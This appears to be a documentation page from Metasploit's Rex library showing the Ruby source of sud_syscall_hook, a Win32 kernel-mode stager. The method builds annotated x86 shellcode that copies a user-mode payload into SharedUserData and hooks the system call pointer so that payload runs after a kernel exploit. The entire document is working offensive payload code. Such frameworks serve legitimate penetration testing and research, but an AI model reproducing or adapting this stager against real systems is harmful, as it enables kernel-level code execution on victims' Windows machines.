sud_syscall_hook (Rex::Payloads::Win32::Kernel::Stager)

# File lib/rex/payloads/win32/kernel/stager.rb, line 25
        def self.sud_syscall_hook(opts = {})
                r0_recovery = opts['RecoveryStub'] || Recovery.default
                r3_payload  = opts['UserModeStub'] || ''
                r3_prefix   = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
                r3_size     = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
                
                r0_stager =
                        "\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
                        "\xBB\x01\x03\xDF\xFF"                         + # mov ebx,0xffdf0301
                        "\x4B"                                         + # dec ebx
                        "\xFC"                                         + # cld
                        "\x8D\x7B\x7C"                                 + # lea edi,[ebx+0x7c]
                        "\x5E"                                         + # pop esi
                        "\x6A" + [r3_size].pack('C')                   + # push byte num_dwords
                        "\x59"                                         + # pop ecx
                        "\xF3\xA5"                                     + # rep movsd
                        "\xBF\x7C\x03\xFE\x7F"                         + # mov edi,0x7ffe037c
                        "\x39\x3B"                                     + # cmp [ebx],edi
                        "\x74\x09"                                     + # jz 
                        "\x8B\x03"                                     + # mov eax,[ebx]
                        "\x8D\x4B\x08"                                 + # lea ecx,[ebx+0x8]
                        "\x89\x01"                                     + # mov [ecx],eax
                        "\x89\x3B"                                     + # mov [ebx],edi
                        r0_recovery +
                        "\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
                        r3_prefix +
                        r3_payload

                return r0_stager
        end